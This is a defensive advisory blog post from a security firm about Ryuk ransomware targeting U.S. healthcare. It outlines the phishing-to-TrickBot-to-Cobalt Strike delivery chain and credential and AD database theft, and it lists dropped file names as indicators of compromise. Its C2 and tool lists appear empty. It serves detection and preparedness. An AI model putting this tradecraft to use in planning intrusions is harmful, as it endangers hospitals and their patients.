Ryuk Ransomware Attack in Healthcare

RE: The joint statement made by the FBI and Cybersecurity & Infrastructure Security Agency (CISA) “Ransomware Activity Targeting the Healthcare and Public Health Sector

FRSecure has been working with the FBI and CISA, directly and indirectly since Saturday, October 24 to assist in the investigation of a credible threat to U.S. hospitals and healthcare providers. During recent incident response engagements, we’ve seen indicators of compromise (IoCs) that confirm Ryuk ransomware attacks are occurring. However, there are still concerns about the nature of such attacks.

Despite our involvement, we chose to be very careful in how we released information to the public. Feeding into any unnecessary fear, uncertainty, or doubt related to events is counter to our mission. Because the FBI and CISA have made their public announcement, we feel comfortable sharing what we know with you.

If you notice unusual activity in your technology environment or have information about an incident, please email us at CSIRT@frsecure.com for immediate assistance.

Learn More in Our Webinar

We hosted a live webinar on Friday, October 30th, at 12 p.m. CST to answer your questions about this developing threat. View the recording here.

About the Attack

The threat of a Ryuk ransomware incident is real. Many details about the joint FBI and CISA announcement are still not known, including attacker coordination, how widespread it may/may not be, timing, and context. We cannot say with certainty that this is a widespread coordinated attack.

This is developing news, and we want to make sure everyone is aware. It’s our collective responsibility to be proactive in finding indicators of compromise (IoC), sharing them with our community, taking preventative measures, and ensuring our response capabilities are effective.

Based upon the IoCs obtained during our investigations, here’s what we’ve seen.

Often, the attack starts with email phishing and/or emails containing an attachment with a malicious payload. In some cases, the attackers used malicious links or existing open connections to the internal network (RDP/TCP 3389 for instance); however, phishing has been most common initial attack vector.

See “Key Findings and Resources” below for more detailed information, but here are some immediate tips for you to limit your chances of suffering from a ransomware attack.

Tips

  • Important: Ensure your data is backed up consistently and that your backups are stored off-network.
    • Any network connectivity could potentially be leveraged by an attacker to destroy your backups.
    • Test your restoration capabilities by testing your backups—even to the point of full/bare-metal restores.
  • Report any unusual activity to your IT/security team’s attention.
  • If you are able, look for common IoCs. If you suspect any are present, immediately bring to your IT/Security Team’s attention
  • If you’re not experiencing anything unusual or seeing any IoCs, great! You are in a position to continue your preparation. Consider completing your own ransomware readiness assessment.

Key Findings and Resources

If you are seeing any of the indicators or activities depicted below in your environment, you could be ransomed or soon-to-be ransomed—even if systems appear to be functioning normally.

The tactics, techniques, and procedures (TTPs) outlined in this communication are or could be associated with the advanced persistent threat (APT) group known as UNC1878. UNC1878 is believed to be the primary organization involved in the joint FBI/CISA announcement.

These indicators can change quickly, and this should not be considered a full, complete, or static dataset.

  • Typical Payload Delivery Method: 
    • Phishing email > TrickBot (malware) > Cobalt Strike (tool) > Ryuk (ransomware)
      NOTE: Cobalt Strike is always used to deliver this attack. Empire (C2) and Metasploit are sometimes used in addition.
    • Secondary payload deployment methods include batch scripts using PSEXEC, BITSadmin, and the Windows Management Interface (WMI).
      NOTE: If you see any unexpected behavior from these legitimate processes, investigate further.
  • Typical Domains for Command and Control (C2):
  • Reconnaissance Tools Used:
  • Credential Harvesting Tools Used:
  • Typical File Names and Locations:
    • Files are usually dropped at c:\user\XXX\AppData\Roaming\xxx.exe
    • Names include:
      • P32.exe
      • P64.exe
      • vVv.exe
      • wmi.bat
      • xxx.exe
      • zZz.exe
      • 1234.zip
      • socks.exe
      • defender.exe
      • _paxe.exe
  • Other Details:
    • Utilizes Signed Code
    • DIT (AD Database) and Registry theft
      • Typically, no other data theft
      • No history of extortion
    • Time to ransom (TTR)
      • Average: 5 days, 17 hours
      • Fastest: 2 days, 6 hours

External Resources

Here are additional and credible resources you can use to assist you in preparation, detection, and response:

Final Thoughts

We cannot stress enough how important it is for you to be prepared. If you see any of the IoCs listed in this bulletin in your environment, please bring them to the attention of your internal security team immediately and reach out to us. FRSecure is always here to help!

Please share this message with everyone, but especially with organizations you know in the healthcare and healthcare supply chain industry sectors. There is certainly the potential that the Ryuk threat will continue to grow.

It’s up to us to get out ahead of it.

Thank you in advance.

Ransomware Assessment

Evan Francen on LinkedinEvan Francen on Twitter
Evan Francen
CEO at FRSecure
Nickname: "The Truth"

I am a 25+ year information security veteran, and I tell it like I see it. I’m not known for being politically correct, and this sometimes gets me into trouble. More often than not; however, clients and colleagues come to appreciate the candor and common sense approach. If you look at security (the right way), you’ll find that it’s just not as complicated as people make it. I hope you enjoy my writings on security and other miscellaneous things. I really have a strong and deep passion for helping people and making the world a better place.

Check out my new book UNSECURITY

0 replies

Leave a Reply

Want to join the discussion?
Feel free to contribute!

Leave a Reply

Your email address will not be published. Required fields are marked *